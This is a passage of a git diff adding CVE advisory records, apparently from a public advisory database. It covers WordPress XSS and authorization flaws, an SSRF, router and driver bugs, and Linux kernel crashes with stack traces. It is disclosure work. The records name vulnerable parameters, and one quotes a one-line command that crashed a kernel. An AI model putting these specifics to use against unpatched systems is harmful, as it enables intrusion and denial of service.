"2026-02-11T15:30:27Z", + "aliases": [ + "CVE-2025-48518" + ], + "details": "Improper input validation in AMD Graphics Driver could allow a local attacker to write out of bounds, potentially resulting in loss of integrity or denial of service.", + "severity": [ + { + "type": "CVSS_V4", + "score": "CVSS:4.0/AV:L/AC:L/AT:N/PR:L/UI:N/VC:N/VI:L/VA:H/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-48518" + }, + { + "type": "WEB", + "url": "https://www.amd.com/en/resources/product-security/bulletin/AMD-SB-6024.html" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-787" + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-11T15:16:15Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-q477-mh2f-28m4/GHSA-q477-mh2f-28m4.json b/advisories/unreviewed/2026/02/GHSA-q477-mh2f-28m4/GHSA-q477-mh2f-28m4.json new file mode 100644 index 0000000000000..0447781f025e7 --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-q477-mh2f-28m4/GHSA-q477-mh2f-28m4.json @@ -0,0 +1,44 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-q477-mh2f-28m4", + "modified": "2026-02-14T09:31:33Z", + "published": "2026-02-14T09:31:33Z", + "aliases": [ + "CVE-2026-1905" + ], + "details": "The Sphere Manager plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the 'width' parameter in the 'show_sphere_image' shortcode in all versions up to, and including, 1.0.2 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with Contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:N" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-1905" + }, + { + "type": "WEB", + "url": "https://plugins.trac.wordpress.org/browser/sphere-manager/tags/1.0.2/plugin.php#L232" + }, + { + "type": "WEB", + "url": "https://plugins.trac.wordpress.org/browser/sphere-manager/trunk/plugin.php#L232" + }, + { + "type": "WEB", + "url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/a27dfc37-81cf-4e95-a331-02fc952e34af?source=cve" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-79" + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-14T07:16:11Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-q4xx-rwj3-jf4m/GHSA-q4xx-rwj3-jf4m.json b/advisories/unreviewed/2026/02/GHSA-q4xx-rwj3-jf4m/GHSA-q4xx-rwj3-jf4m.json new file mode 100644 index 0000000000000..bb30dd76f92f2 --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-q4xx-rwj3-jf4m/GHSA-q4xx-rwj3-jf4m.json @@ -0,0 +1,41 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-q4xx-rwj3-jf4m", + "modified": "2026-02-14T18:30:16Z", + "published": "2026-02-14T18:30:16Z", + "aliases": [ + "CVE-2026-23200" + ], + "details": "In the Linux kernel, the following vulnerability has been resolved:\n\nipv6: Fix ECMP sibling count mismatch when clearing RTF_ADDRCONF\n\nsyzbot reported a kernel BUG in fib6_add_rt2node() when adding an IPv6\nroute. [0]\n\nCommit f72514b3c569 (\"ipv6: clear RA flags when adding a static\nroute\") introduced logic to clear RTF_ADDRCONF from existing routes\nwhen a static route with the same nexthop is added. However, this\ncauses a problem when the existing route has a gateway.\n\nWhen RTF_ADDRCONF is cleared from a route that has a gateway, that\nroute becomes eligible for ECMP, i.e. rt6_qualify_for_ecmp() returns\ntrue. The issue is that this route was never added to the\nfib6_siblings list.\n\nThis leads to a mismatch between the following counts:\n\n- The sibling count computed by iterating fib6_next chain, which\n includes the newly ECMP-eligible route\n\n- The actual siblings in fib6_siblings list, which does not include\n that route\n\nWhen a subsequent ECMP route is added, fib6_add_rt2node() hits\nBUG_ON(sibling->fib6_nsiblings != rt->fib6_nsiblings) because the\ncounts don't match.\n\nFix this by only clearing RTF_ADDRCONF when the existing route does\nnot have a gateway. Routes without a gateway cannot qualify for ECMP\nanyway (rt6_qualify_for_ecmp() requires fib_nh_gw_family), so clearing\nRTF_ADDRCONF on them is safe and matches the original intent of the\ncommit.\n\n[0]:\nkernel BUG at net/ipv6/ip6_fib.c:1217!\nOops: invalid opcode: 0000 [#1] SMP KASAN PTI\nCPU: 0 UID: 0 PID: 6010 Comm: syz.0.17 Not tainted syzkaller #0 PREEMPT(full)\nHardware name: Google Google Compute Engine/Google Compute Engine, BIOS Google 10/25/2025\nRIP: 0010:fib6_add_rt2node+0x3433/0x3470 net/ipv6/ip6_fib.c:1217\n[...]\nCall Trace:\n \n fib6_add+0x8da/0x18a0 net/ipv6/ip6_fib.c:1532\n __ip6_ins_rt net/ipv6/route.c:1351 [inline]\n ip6_route_add+0xde/0x1b0 net/ipv6/route.c:3946\n ipv6_route_ioctl+0x35c/0x480 net/ipv6/route.c:4571\n inet6_ioctl+0x219/0x280 net/ipv6/af_inet6.c:577\n sock_do_ioctl+0xdc/0x300 net/socket.c:1245\n sock_ioctl+0x576/0x790 net/socket.c:1366\n vfs_ioctl fs/ioctl.c:51 [inline]\n __do_sys_ioctl fs/ioctl.c:597 [inline]\n __se_sys_ioctl+0xfc/0x170 fs/ioctl.c:583\n do_syscall_x64 arch/x86/entry/syscall_64.c:63 [inline]\n do_syscall_64+0xfa/0xf80 arch/x86/entry/syscall_64.c:94\n entry_SYSCALL_64_after_hwframe+0x77/0x7f", + "severity": [], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-23200" + }, + { + "type": "WEB", + "url": "https://git.kernel.org/stable/c/50b7c7a255858a85c4636a1e990ca04591153dca" + }, + { + "type": "WEB", + "url": "https://git.kernel.org/stable/c/b8ad2d53f706aeea833d23d45c0758398fede580" + }, + { + "type": "WEB", + "url": "https://git.kernel.org/stable/c/bbf4a17ad9ffc4e3d7ec13d73ecd59dea149ed25" + }, + { + "type": "WEB", + "url": "https://git.kernel.org/stable/c/d8143c54ceeba232dc8a13aa0afa14a44b371d93" + } + ], + "database_specific": { + "cwe_ids": [], + "severity": null, + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-14T17:15:57Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-q543-x74m-r8q9/GHSA-q543-x74m-r8q9.json b/advisories/unreviewed/2026/02/GHSA-q543-x74m-r8q9/GHSA-q543-x74m-r8q9.json new file mode 100644 index 0000000000000..d7850968c5787 --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-q543-x74m-r8q9/GHSA-q543-x74m-r8q9.json @@ -0,0 +1,36 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-q543-x74m-r8q9", + "modified": "2026-02-18T00:30:16Z", + "published": "2026-02-18T00:30:16Z", + "aliases": [ + "CVE-2026-22048" + ], + "details": "StorageGRID (formerly StorageGRID Webscale) versions prior to 11.9.0.12 and 12.0.0.4 with Single Sign-on enabled and configured to use Microsoft Entra ID (formerly Azure AD) as an IdP are susceptible to a Server-Side Request Forgery (SSRF) vulnerability. Successful exploit could allow an authenticated attacker with low privileges to delete configuration data or deny access to some resources.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:H" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-22048" + }, + { + "type": "WEB", + "url": "https://security.netapp.com/advisory/NTAP-20260217-0001" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-918" + ], + "severity": "HIGH", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-18T00:16:18Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-q54q-h92j-2fm3/GHSA-q54q-h92j-2fm3.json b/advisories/unreviewed/2026/02/GHSA-q54q-h92j-2fm3/GHSA-q54q-h92j-2fm3.json new file mode 100644 index 0000000000000..786ce9912c29e --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-q54q-h92j-2fm3/GHSA-q54q-h92j-2fm3.json @@ -0,0 +1,48 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-q54q-h92j-2fm3", + "modified": "2026-02-19T18:31:49Z", + "published": "2026-02-19T18:31:49Z", + "aliases": [ + "CVE-2025-11725" + ], + "details": "The Aruba HiSpeed Cache plugin for WordPress is vulnerable to unauthorized modification of data due to a missing capability checks on the multiple functions in all versions up to, and including, 3.0.2. This makes it possible for unauthenticated attackers to modify plugin's configuration settings, enable or disable features, as well as enable/disable WordPress cron jobs or debug mode", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:N" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-11725" + }, + { + "type": "WEB", + "url": "https://plugins.trac.wordpress.org/browser/aruba-hispeed-cache/tags/3.0.1/aruba-hispeed-cache.php#L590" + }, + { + "type": "WEB", + "url": "https://plugins.trac.wordpress.org/browser/aruba-hispeed-cache/tags/3.0.1/aruba-hispeed-cache.php#L618" + }, + { + "type": "WEB", + "url": "https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&old=3399636%40aruba-hispeed-cache&new=3399636%40aruba-hispeed-cache&sfp_email=&sfph_mail=" + }, + { + "type": "WEB", + "url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/2830c958-13d1-4c69-8dde-7fc091db02eb?source=cve" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-862" + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-19T07:17:26Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-q5q3-fgwr-rr9h/GHSA-q5q3-fgwr-rr9h.json b/advisories/unreviewed/2026/02/GHSA-q5q3-fgwr-rr9h/GHSA-q5q3-fgwr-rr9h.json new file mode 100644 index 0000000000000..bc18a59fea38a --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-q5q3-fgwr-rr9h/GHSA-q5q3-fgwr-rr9h.json @@ -0,0 +1,56 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-q5q3-fgwr-rr9h", + "modified": "2026-02-17T18:32:55Z", + "published": "2026-02-12T00:31:04Z", + "aliases": [ + "CVE-2026-20621" + ], + "details": "The issue was addressed with improved memory handling. This issue is fixed in macOS Tahoe 26.3, macOS Sonoma 14.8.4, macOS Sequoia 15.7.4, iOS 18.7.5 and iPadOS 18.7.5, visionOS 26.3, iOS 26.3 and iPadOS 26.3. An app may be able to cause unexpected system termination or corrupt kernel memory.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-20621" + }, + { + "type": "WEB", + "url": "https://support.apple.com/en-us/126346" + }, + { + "type": "WEB", + "url": "https://support.apple.com/en-us/126347" + }, + { + "type": "WEB", + "url": "https://support.apple.com/en-us/126348" + }, + { + "type": "WEB", + "url": "https://support.apple.com/en-us/126349" + }, + { + "type": "WEB", + "url": "https://support.apple.com/en-us/126350" + }, + { + "type": "WEB", + "url": "https://support.apple.com/en-us/126353" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-119" + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-11T23:16:05Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-q5vh-ff4q-5j62/GHSA-q5vh-ff4q-5j62.json b/advisories/unreviewed/2026/02/GHSA-q5vh-ff4q-5j62/GHSA-q5vh-ff4q-5j62.json new file mode 100644 index 0000000000000..e45f9a5f710f4 --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-q5vh-ff4q-5j62/GHSA-q5vh-ff4q-5j62.json @@ -0,0 +1,40 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-q5vh-ff4q-5j62", + "modified": "2026-02-11T21:30:39Z", + "published": "2026-02-11T15:30:25Z", + "aliases": [ + "CVE-2025-48723" + ], + "details": "A buffer overflow vulnerability has been reported to affect Qsync Central. If a remote attacker gains a user account, they can then exploit the vulnerability to modify memory or crash processes.\n\nWe have already fixed the vulnerability in the following version:\nQsync Central 5.0.0.4 ( 2026/01/20 ) and later", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:H" + }, + { + "type": "CVSS_V4", + "score": "CVSS:4.0/AV:N/AC:L/AT:P/PR:L/UI:N/VC:N/VI:N/VA:L/SC:N/SI:N/SA:N/E:U/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-48723" + }, + { + "type": "WEB", + "url": "https://www.qnap.com/en/security-advisory/qsa-26-02" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-120" + ], + "severity": "LOW", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-11T13:15:52Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-q5w8-336h-87cx/GHSA-q5w8-336h-87cx.json b/advisories/unreviewed/2026/02/GHSA-q5w8-336h-87cx/GHSA-q5w8-336h-87cx.json new file mode 100644 index 0000000000000..d3796f7f27e40 --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-q5w8-336h-87cx/GHSA-q5w8-336h-87cx.json @@ -0,0 +1,25 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-q5w8-336h-87cx", + "modified": "2026-02-13T21:31:37Z", + "published": "2026-02-13T21:31:37Z", + "aliases": [ + "CVE-2025-27928" + ], + "details": "Rejected reason: This CVE ID has been rejected or withdrawn by its CVE Numbering Authority because it is Unused", + "severity": [], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-27928" + } + ], + "database_specific": { + "cwe_ids": [], + "severity": null, + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-13T19:16:29Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-q6cr-hchj-9qvc/GHSA-q6cr-hchj-9qvc.json b/advisories/unreviewed/2026/02/GHSA-q6cr-hchj-9qvc/GHSA-q6cr-hchj-9qvc.json new file mode 100644 index 0000000000000..05360b11f7477 --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-q6cr-hchj-9qvc/GHSA-q6cr-hchj-9qvc.json @@ -0,0 +1,33 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-q6cr-hchj-9qvc", + "modified": "2026-02-14T18:30:16Z", + "published": "2026-02-14T18:30:16Z", + "aliases": [ + "CVE-2026-23183" + ], + "details": "In the Linux kernel, the following vulnerability has been resolved:\n\ncgroup/dmem: fix NULL pointer dereference when setting max\n\nAn issue was triggered:\n\n BUG: kernel NULL pointer dereference, address: 0000000000000000\n #PF: supervisor read access in kernel mode\n #PF: error_code(0x0000) - not-present page\n PGD 0 P4D 0\n Oops: Oops: 0000 [#1] SMP NOPTI\n CPU: 15 UID: 0 PID: 658 Comm: bash Tainted: 6.19.0-rc6-next-2026012\n Tainted: [O]=OOT_MODULE\n Hardware name: QEMU Standard PC (i440FX + PIIX, 1996),\n RIP: 0010:strcmp+0x10/0x30\n RSP: 0018:ffffc900017f7dc0 EFLAGS: 00000246\n RAX: 0000000000000000 RBX: 0000000000000000 RCX: ffff888107cd4358\n RDX: 0000000019f73907 RSI: ffffffff82cc381a RDI: 0000000000000000\n RBP: ffff8881016bef0d R08: 000000006c0e7145 R09: 0000000056c0e714\n R10: 0000000000000001 R11: ffff888107cd4358 R12: 0007ffffffffffff\n R13: ffff888101399200 R14: ffff888100fcb360 R15: 0007ffffffffffff\n CS: 0010 DS: 0000 ES: 0000 CR0: 0000000080050033\n CR2: 0000000000000000 CR3: 0000000105c79000 CR4: 00000000000006f0\n Call Trace:\n \n dmemcg_limit_write.constprop.0+0x16d/0x390\n ? __pfx_set_resource_max+0x10/0x10\n kernfs_fop_write_iter+0x14e/0x200\n vfs_write+0x367/0x510\n ksys_write+0x66/0xe0\n do_syscall_64+0x6b/0x390\n entry_SYSCALL_64_after_hwframe+0x76/0x7e\n RIP: 0033:0x7f42697e1887\n\nIt was trriggered setting max without limitation, the command is like:\n\"echo test/region0 > dmem.max\". To fix this issue, add check whether\noptions is valid after parsing the region_name.", + "severity": [], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-23183" + }, + { + "type": "WEB", + "url": "https://git.kernel.org/stable/c/43151f812886be1855d2cba059f9c93e4729460b" + }, + { + "type": "WEB", + "url": "https://git.kernel.org/stable/c/c13816e8fa23deec6a8d7465d9e637fd02683b5c" + } + ], + "database_specific": { + "cwe_ids": [], + "severity": null, + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-14T17:15:56Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-q6f4-2qxx-8cww/GHSA-q6f4-2qxx-8cww.json b/advisories/unreviewed/2026/02/GHSA-q6f4-2qxx-8cww/GHSA-q6f4-2qxx-8cww.json new file mode 100644 index 0000000000000..9bea553681f87 --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-q6f4-2qxx-8cww/GHSA-q6f4-2qxx-8cww.json @@ -0,0 +1,37 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-q6f4-2qxx-8cww", + "modified": "2026-02-12T21:31:27Z", + "published": "2026-02-12T21:31:27Z", + "aliases": [ + "CVE-2025-67433" + ], + "details": "A heap buffer overflow in the processRequest function of Open TFTP Server MultiThreaded v1.7 allows attackers to cause a Denial of Service (DoS) via a crafted DATA packet.", + "severity": [], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-67433" + }, + { + "type": "WEB", + "url": "https://gist.github.com/Hyobin/f1b7d48d29e60a378bb9c88ba8b8080a" + }, + { + "type": "WEB", + "url": "https://gist.github.com/transparencybeam/f1b7d48d29e60a378bb9c88ba8b8080a" + }, + { + "type": "WEB", + "url": "https://sourceforge.net/projects/tftp-server/files/tftp%20server%20multithreaded" + } + ], + "database_specific": { + "cwe_ids": [], + "severity": null, + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-12T20:16:02Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-q6h4-vchv-83f2/GHSA-q6h4-vchv-83f2.json b/advisories/unreviewed/2026/02/GHSA-q6h4-vchv-83f2/GHSA-q6h4-vchv-83f2.json new file mode 100644 index 0000000000000..c0cdab54f3e37 --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-q6h4-vchv-83f2/GHSA-q6h4-vchv-83f2.json @@ -0,0 +1,56 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-q6h4-vchv-83f2", + "modified": "2026-02-19T18:31:51Z", + "published": "2026-02-19T18:31:51Z", + "aliases": [ + "CVE-2026-2702" + ], + "details": "A security flaw has been discovered in Beetel 777VR1 up to 01.00.09. This issue affects some unknown processing of the component WPA2 PSK. Performing a manipulation results in hard-coded credentials. The attacker must have access to the local network to execute the attack. The complexity of an attack is rather high. The exploitability is assessed as difficult. The exploit has been released to the public and may be used for attacks. The vendor was contacted early about this disclosure but did not respond in any way.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:A/AC:H/PR:N/UI:N/S:U/C:L/I:N/A:N" + }, + { + "type": "CVSS_V4", + "score": "CVSS:4.0/AV:A/AC:H/AT:N/PR:N/UI:N/VC:L/VI:N/VA:N/SC:N/SI:N/SA:N/E:P/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-2702" + }, + { + "type": "WEB", + "url": "https://gist.github.com/raghav20232023/a79c06d2d2562238a6c9d5e6229a13fa" + }, + { + "type": "WEB", + "url": "https://gist.github.com/raghav20232023/a79c06d2d2562238a6c9d5e6229a13fa#steps-to-reproduce" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?ctiid.346648" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?id.346648" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?submit.754354" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-259" + ], + "severity": "LOW", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-19T07:17:49Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-q6v4-fwc8-3mpc/GHSA-q6v4-fwc8-3mpc.json b/advisories/unreviewed/2026/02/GHSA-q6v4-fwc8-3mpc/GHSA-q6v4-fwc8-3mpc.json index 9c0c33dda1143..91a9ca8f21aed 100644 --- a/advisories/unreviewed/2026/02/GHSA-q6v4-fwc8-3mpc/GHSA-q6v4-fwc8-3mpc.json +++ b/advisories/unreviewed/2026/02/GHSA-q6v4-fwc8-3mpc/GHSA-q6v4-fwc8-3mpc.json @@ -1,13 +1,17 @@ { "schema_version": "1.4.0", "id": "GHSA-q6v4-fwc8-3mpc", - "modified": "2026-02-05T18:30:32Z", + "modified": "2026-02-12T18:30:20Z", "published": "2026-02-05T18:30:32Z", "aliases": [ "CVE-2025-15551" ], "details": "The response coming from TP-Link Archer MR200 v5.2, C20 v6, TL-WR850N v3, and TL-WR845N v4 for any request is getting executed by the JavaScript function like eval directly without any check. Attackers can exploit this vulnerability via a Man-in-the-Middle (MitM) attack to execute JavaScript code on the router's admin web portal without the user's permission or knowledge.", "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:L/A:L" + }, { "type": "CVSS_V4", "score": "CVSS:4.0/AV:A/AC:L/AT:P/PR:N/UI:P/VC:H/VI:L/VA:L/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X" diff --git a/advisories/unreviewed/2026/02/GHSA-q73g-q59m-6qff/GHSA-q73g-q59m-6qff.json b/advisories/unreviewed/2026/02/GHSA-q73g-q59m-6qff/GHSA-q73g-q59m-6qff.json new file mode 100644 index 0000000000000..2c261ec599e9c --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-q73g-q59m-6qff/GHSA-q73g-q59m-6qff.json @@ -0,0 +1,44 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-q73g-q59m-6qff", + "modified": "2026-02-14T09:31:33Z", + "published": "2026-02-14T09:31:33Z", + "aliases": [ + "CVE-2026-1939" + ], + "details": "The Percent to Infograph plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the `percent_to_graph` shortcode in all versions up to, and including, 1.0 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:N" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-1939" + }, + { + "type": "WEB", + "url": "https://plugins.trac.wordpress.org/browser/percent-to-infograph/tags/1.0/percent_infograph.php#L85" + }, + { + "type": "WEB", + "url": "https://plugins.trac.wordpress.org/browser/percent-to-infograph/trunk/percent_infograph.php#L85" + }, + { + "type": "WEB", + "url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/8f6e6fcb-1688-424e-b0fa-1c0ace474c2c?source=cve" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-79" + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-14T07:16:11Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-q7cc-x725-hp7g/GHSA-q7cc-x725-hp7g.json b/advisories/unreviewed/2026/02/GHSA-q7cc-x725-hp7g/GHSA-q7cc-x725-hp7g.json new file mode 100644 index 0000000000000..454dd1a293821 --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-q7cc-x725-hp7g/GHSA-q7cc-x725-hp7g.json @@ -0,0 +1,48 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-q7cc-x725-hp7g", + "modified": "2026-02-18T09:31:03Z", + "published": "2026-02-18T09:31:03Z", + "aliases": [ + "CVE-2026-1807" + ], + "details": "The InteractiveCalculator for WordPress plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's 'interactivecalculator' shortcode in all versions up to, and including, 1.0.3 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:N" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-1807" + }, + { + "type": "WEB", + "url": "https://plugins.trac.wordpress.org/browser/interactivecalculator/tags/1.0.1/interactivecalculator.php#L44" + }, + { + "type": "WEB", + "url": "https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&old=3456849%40interactivecalculator&new=3456849%40interactivecalculator&sfp_email=&sfph_mail=" + }, + { + "type": "WEB", + "url": "https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&old=3456870%40interactivecalculator&new=3456870%40interactivecalculator&sfp_email=&sfph_mail=" + }, + { + "type": "WEB", + "url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/5c38f080-59c7-4201-9e87-87ee9ab6b97b?source=cve" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-79" + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-18T07:16:09Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-q7w4-8rgm-gmv2/GHSA-q7w4-8rgm-gmv2.json b/advisories/unreviewed/2026/02/GHSA-q7w4-8rgm-gmv2/GHSA-q7w4-8rgm-gmv2.json new file mode 100644 index 0000000000000..fa9fd8957087f --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-q7w4-8rgm-gmv2/GHSA-q7w4-8rgm-gmv2.json @@ -0,0 +1,52 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-q7w4-8rgm-gmv2", + "modified": "2026-02-12T21:31:27Z", + "published": "2026-02-12T21:31:27Z", + "aliases": [ + "CVE-2019-25344" + ], + "details": "Wondershare MobileGo 8.5.0 contains an insecure file permissions vulnerability that allows local users to modify executable files in the application directory. Attackers can replace the original MobileGo.exe with a malicious executable to create a new user account and add it to the Administrators group with full system access.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H" + }, + { + "type": "CVSS_V4", + "score": "CVSS:4.0/AV:L/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2019-25344" + }, + { + "type": "WEB", + "url": "https://www.exploit-db.com/exploits/47667" + }, + { + "type": "WEB", + "url": "https://www.vulncheck.com/advisories/mobilego-insecure-file-permissions" + }, + { + "type": "WEB", + "url": "https://www.wondershare.net" + }, + { + "type": "WEB", + "url": "https://www.wondershare.net/mobilego" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-732" + ], + "severity": "HIGH", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-12T20:16:01Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-q7wp-4j7p-g4vj/GHSA-q7wp-4j7p-g4vj.json 